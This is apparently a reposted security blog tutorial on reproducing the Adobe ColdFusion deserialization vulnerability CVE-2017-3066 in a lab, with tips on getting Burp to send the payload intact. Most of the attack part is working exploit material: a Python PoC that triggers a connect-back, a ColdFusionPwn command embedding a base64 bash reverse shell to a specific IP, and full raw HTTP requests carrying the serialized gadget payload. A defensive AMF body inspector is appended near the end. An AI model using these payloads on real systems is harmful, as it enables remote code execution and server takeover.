Adobe ColdFusion Deserialization Vulnerability Reproduction: Pitfalls

admin · 2024-10-14 05:35:30

Adobe ColdFusion is a dynamic web server product from the US company Adobe; the CFML (ColdFusion Markup Language) it runs is a programming language designed for web applications.

Adobe ColdFusion contains a Java deserialization vulnerability. An attacker can exploit it to execute arbitrary code in the context of the affected application or to cause a denial of service. The following versions are affected: Adobe ColdFusion (2016 release) Update 3 and earlier, ColdFusion 11 Update 11 and earlier, and ColdFusion 10 Update 22 and earlier.

References:

  • https://codewhitesec.blogspot.com.au/2018/03/exploiting-adobe-coldfusion.html

  • https://www.exploit-db.com/exploits/43993

  • https://github.com/codewhitesec/ColdFusionPwn

I have exploited this vulnerability in a real engagement, and at the time it nearly broke me: I went through a lot of Burp versions before it worked. Today I happened to run into this bug again, so I set it up locally to reproduce it.

Use the vulhub environment. (vulhub is the GOAT.)


The earlier steps can be followed as in https://github.com/vulhub/vulhub/blob/master/coldfusion/CVE-2010-2861/README.zh-cn.md.

At this stage many people find their exploit does not work, and the reason is Burp.

Let's look at the CVE-2017-3066 PoC:

```python
# CVE-2017-3066 PoC (Python 2, from exploit-db 43993): sends a serialized
# sun.rmi.server.UnicastRef inside an AMF3 message to /flex2gateway/amf so that
# the server connects back to callback_IP:callback_port (a JRMP listener).
import struct
import sys

import requests

if len(sys.argv) != 5:
    print "Usage: ./cf_blazeds_des.py target_IP target_port callback_IP callback_port"
    quit()

target_IP = sys.argv[1]
target_port = sys.argv[2]
callback_IP = sys.argv[3]
callback_port = sys.argv[4]

# AMF0 envelope: version 3, no headers, one message with empty target/response URIs
# and unknown body length (0xffffffff), then the AVM+ marker 0x11 (switch to AMF3)
# and the AMF3 object marker 0x0a.
amf_payload = ('\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\x11\x0a' +
               # traits 0x07 = inline, externalizable object; 0x33 = 25-byte class name
               '\x07\x33' + 'sun.rmi.server.UnicastRef' +
               # UnicastRef.writeExternal fields: host, port, ObjID/UID, trailing boolean
               struct.pack('>H', len(callback_IP)) + callback_IP +
               struct.pack('>I', int(callback_port)) +
               '\xf9\x6a\x76\x7b\x7c\xde\x68\x4f\x76\xd8\xaa\x3d\x00\x00\x01\x5b\xb0\x4c\x1d\x81\x80\x01\x00')

url = "http://" + target_IP + ":" + target_port + "/flex2gateway/amf"
headers = {'Content-Type': 'application/x-amf'}
response = requests.post(url, headers=headers, data=amf_payload, verify=False)
```

Let's get started:

```shell
(base) ➜  ColdFusion java -cp coldpwn.jar:yso.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTguMTkwLjk3LjE5LzgxODEgMD4mMQ==}|{base64,-d}|{bash,-i}' poc.ser
```

Take a look at the hex of poc.ser (xxd poc.ser):


Import it into Burp (this is where Burp falls over):

```http
POST /flex2gateway/amf HTTP/1.1
Host: 60.205.212.75:8006
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Connection: close
Content-Type: application/x-amf
Content-Length: 3003

x00x03x00x00x00x01x00x00x00x00xffxffxffxffx11x0aGorg.apache.axis2.util.MetaDataEntry|™‹ÒÆO´ã*¬ísrjava.util.PriorityQueue”Ú0´û?‚±IsizeLcomparatortLjava/util/Comparator;xpsr+org.apache.commons.beanutils.BeanComparatorώ‚þNñ~Lcomparatorq~LpropertytLjava/lang/String;xpsr?org.apache.commons.collections.comparators.ComparableComparatorûô™%¸n±7xptoutputPropertieswsr:com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl  WOÁn¬«3I_indentNumberI_transletIndex[_bytecodest[[B[_classt[Ljava/lang/Class;L_nameq~L_outputPropertiestLjava/util/Properties;xpÿÿÿÿur[[BKýggÛ7xpur[B¬óøTàxp÷Êþº¾29"7%&serialVersionUIDJConstantValue­ “ó‘Ýï><init>()VCodeLineNumberTableLocalVariableTablethisStubTransletPayloadInnerClasses5Lysoserial/payloads/util/Gadgets$StubTransletPayload;  transformr(Lcom/sun/org/apache/xalan/internal/xsltc/DOM;[Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;)Vdocument-Lcom/sun/org/apache/xalan/internal/xsltc/DOM;handlersB[Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;Exceptions'¦(Lcom/sun/org/apache/xalan/internal/xsltc/DOM;Lcom/sun/org/apache/xml/internal/dtm/DTMAxisIterator;Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;)Viterator5Lcom/sun/org/apache/xml/internal/dtm/DTMAxisIterator;handlerALcom/sun/org/apache/xml/internal/serializer/SerializationHandler;SourceFileGadgets.java(3ysoserial/payloads/util/Gadgets$StubTransletPayload@com/sun/org/apache/xalan/internal/xsltc/runtime/AbstractTransletjava/io/Serializable9com/sun/org/apache/xalan/internal/xsltc/TransletExceptionysoserial/payloads/util/Gadgets<clinit>java/lang/Runtime*getRuntime()Ljava/lang/Runtime;,-+.abash -c 
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTguMTkwLjk3LjE5LzgxODEgMD4mMQ==}|{base64,-d}|{bash,-i}0exec'(Ljava/lang/String;)Ljava/lang/Process;23+4StackMapTableysoserial/Pwner172094074634980 Lysoserial/Pwner172094074634980;!/*·±/8?±3 8I±6*8)$§L¸/1¶5W±6 !#  uq~ÔÊþº¾2serialVersionUIDJConstantValueqæiî<mG<init>()VCodeLineNumberTableLocalVariableTablethisFooInnerClasses%Lysoserial/payloads/util/Gadgets$Foo;SourceFileGadgets.java#ysoserial/payloads/util/Gadgets$Foojava/lang/Objectjava/io/Serializableysoserial/payloads/util/Gadgets!/*·±:  ptPwnrpwxq~x
```

The hex does not match the file, so the exploit cannot succeed!

There is no need to hunt through a pile of Burp builds for one that works; Postman handles it in one go!


Configure the Postman proxy so that Postman's traffic is routed through Burp.


The PoC is generated into the poc.ser file; send it as the request body to http://your-ip:8500/flex2gateway/amf with Content-Type application/x-amf:


Import it into Postman.


Click Send.

Now Burp receives the traffic:


This time the hex mismatch problem no longer occurs.

```http
POST /flex2gateway/amf HTTP/1.1
Content-Type: application/x-amf
User-Agent: PostmanRuntime/7.28.4
Accept: */*
Postman-Token: e6337283-3d4b-4ffb-bec0-b7f5d6575345
Host: 60.205.212.75:8006
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=21449A61E070DA3C42D224ED7EBF1F33.cfusion
Content-Length: 2932

Gorg.apache.axis2.util.MetaDataEntry|����O��*��srjava.util.PriorityQueue��0��?��IsizeLcomparatortLjava/util/Comparator;xpsr+org.apache.commons.beanutils.BeanComparatorώ��N�~Lcomparatorq~LpropertytLjava/lang/String;xpsr?org.apache.commons.collections.comparators.ComparableComparator���%�n�7xptoutputPropertieswsr:com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl  WO�n��3I_indentNumberI_transletIndex[_bytecodest[[B[_classt[Ljava/lang/Class;L_nameq~L_outputPropertiestLjava/util/Properties;xp����ur[[BK�gg�7xpur[B���T�xp�����29"7%&serialVersionUIDJConstantValue� ����><init>()VCodeLineNumberTableLocalVariableTablethisStubTransletPayloadInnerClasses5Lysoserial/payloads/util/Gadgets$StubTransletPayload;  transformr(Lcom/sun/org/apache/xalan/internal/xsltc/DOM;[Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;)Vdocument-Lcom/sun/org/apache/xalan/internal/xsltc/DOM;handlersB[Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;Exceptions'�(Lcom/sun/org/apache/xalan/internal/xsltc/DOM;Lcom/sun/org/apache/xml/internal/dtm/DTMAxisIterator;Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;)Viterator5Lcom/sun/org/apache/xml/internal/dtm/DTMAxisIterator;handlerALcom/sun/org/apache/xml/internal/serializer/SerializationHandler;SourceFileGadgets.java(3ysoserial/payloads/util/Gadgets$StubTransletPayload@com/sun/org/apache/xalan/internal/xsltc/runtime/AbstractTransletjava/io/Serializable9com/sun/org/apache/xalan/internal/xsltc/TransletExceptionysoserial/payloads/util/Gadgets<clinit>java/lang/Runtime*getRuntime()Ljava/lang/Runtime;,-+.abash -c 
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTguMTkwLjk3LjE5LzgxODEgMD4mMQ==}|{base64,-d}|{bash,-i}0exec'(Ljava/lang/String;)Ljava/lang/Process;23+4StackMapTableysoserial/Pwner172094074634980 Lysoserial/Pwner172094074634980;!/*��/8?�3 8I�6*8)$�L�/1�5W�6 !#  uq~�����2serialVersionUIDJConstantValueq�i�<mG<init>()VCodeLineNumberTableLocalVariableTablethisFooInnerClasses%Lysoserial/payloads/util/Gadgets$Foo;SourceFileGadgets.java#ysoserial/payloads/util/Gadgets$Foojava/lang/Objectjava/io/Serializableysoserial/payloads/util/Gadgets!/*��:  ptPwnrpwxq~x
```
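As an added example (my own code, not from the original post or the ColdFusionPwn project), here is a small Python inspector for an application/x-amf request body of the kind shown above, written from the reviewing side: it parses the AMF0 envelope, reads the AMF3 externalizable class name that opens the message (org.apache.axis2.util.MetaDataEntry in the requests above), scans the embedded Java serialization stream for class names such as the BeanComparator and TemplatesImpl gadgets, and flags bodies where \xNN escapes went over the wire as ASCII text, which is the Burp symptom the post describes. The sample bodies are constructed, the class-name scan is a heuristic, and the envelope parser assumes a packet with no AMF0 headers.

```python
import re
import struct

JAVA_SER_MAGIC = b"\xac\xed\x00\x05"  # Java serialization header (magic 0xACED, version 5)
CLASS_NAME_RE = re.compile(rb"[A-Za-z_$][A-Za-z0-9_$.]*")
TEXT_ESCAPES_RE = re.compile(rb"(?:\\?x[0-9a-fA-F]{2}){4,}")  # "\xNN" escapes sent as plain text

def read_u29(buf, pos):  # AMF3 variable-length integer -> (value, next_pos)
    value = 0
    for _ in range(3):
        value = (value << 7) | (buf[pos] & 0x7F)
        pos += 1
        if not buf[pos - 1] & 0x80:
            return value, pos
    return (value << 8) | buf[pos], pos + 1

def java_class_names(stream):  # heuristic: TC_OBJECT TC_CLASSDESC ('sr') + UTF length + class name
    names, pos = [], 0
    while (pos := stream.find(b"sr", pos)) >= 0 and pos + 4 <= len(stream):
        (length,) = struct.unpack(">H", stream[pos + 2:pos + 4])
        name = stream[pos + 4:pos + 4 + length]
        ok = 0 < length < 256 and len(name) == length and CLASS_NAME_RE.fullmatch(name)
        if ok:
            names.append(name.decode("ascii"))
        pos += 4 + length if ok else 1
    return names

def inspect_amf_request(body):
    """Summarise an application/x-amf body: AMF0 envelope, AMF3 externalizable class, Java stream."""
    info = {"amf_version": None, "externalizable_class": None, "java_serialized": False,
            "java_classes": [], "escapes_pasted_as_text": bool(TEXT_ESCAPES_RE.search(body))}
    try:
        version, header_count, msg_count = struct.unpack(">HHH", body[:6])
        if version in (0, 3) and header_count == 0 and msg_count >= 1:
            info["amf_version"] = version
            (tlen,) = struct.unpack(">H", body[6:8])
            (rlen,) = struct.unpack(">H", body[8 + tlen:10 + tlen])
            pos = 10 + tlen + rlen + 4  # past target/response URIs and body length (0xffffffff = unknown)
            if body[pos:pos + 2] == b"\x11\x0a":  # AMF0 AVM+ marker, then AMF3 object marker
                traits, pos = read_u29(body, pos + 2)
                slen, pos = read_u29(body, pos)
                if traits & 0x07 == 0x07 and slen & 1:  # inline externalizable object, inline name string
                    info["externalizable_class"] = body[pos:pos + (slen >> 1)].decode("utf-8", "replace")
    except (struct.error, IndexError):
        pass
    magic = body.find(JAVA_SER_MAGIC)
    if magic >= 0:
        info["java_serialized"] = True
        info["java_classes"] = java_class_names(body[magic:])
    return info

SAMPLE_BODY = (  # constructed, modelled on the first bytes of the page's dump (not the real poc.ser)
    b"\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff"  # v3, 0 headers, 1 message, empty URIs
    b"\x11\x0a\x07\x47org.apache.axis2.util.MetaDataEntry"        # traits 0x07, 0x47 -> 35-byte string
    b"\xac\xed\x00\x05sr\x00\x17java.util.PriorityQueue\x00\x00"
    b"sr\x00\x2borg.apache.commons.beanutils.BeanComparator\x00\x00"
    b"sr\x00\x3acom.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"
)
# The same start pasted into a text field: escapes survive as ASCII and the envelope is gone.
PASTED_BODY = b"x00x03x00x00x00x01x00x00x00x00xffxffxffxffx11x0aGorg.apache.axis2.util.MetaDataEntry"
```

Running inspect_amf_request over the raw bytes of poc.ser versus the bytes a proxy actually forwarded makes the Burp mismatch visible without reading 3 KB of xxd output.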

This article was first published on the WeChat official account 黑伞安全: Adobe ColdFusion Deserialization Vulnerability Reproduction: Pitfalls

Please keep this link when reprinting (CN-SEC, with thanks to the original author): Adobe ColdFusion Deserialization Vulnerability Reproduction: Pitfalls http://cn-sec.com/archives/542577.html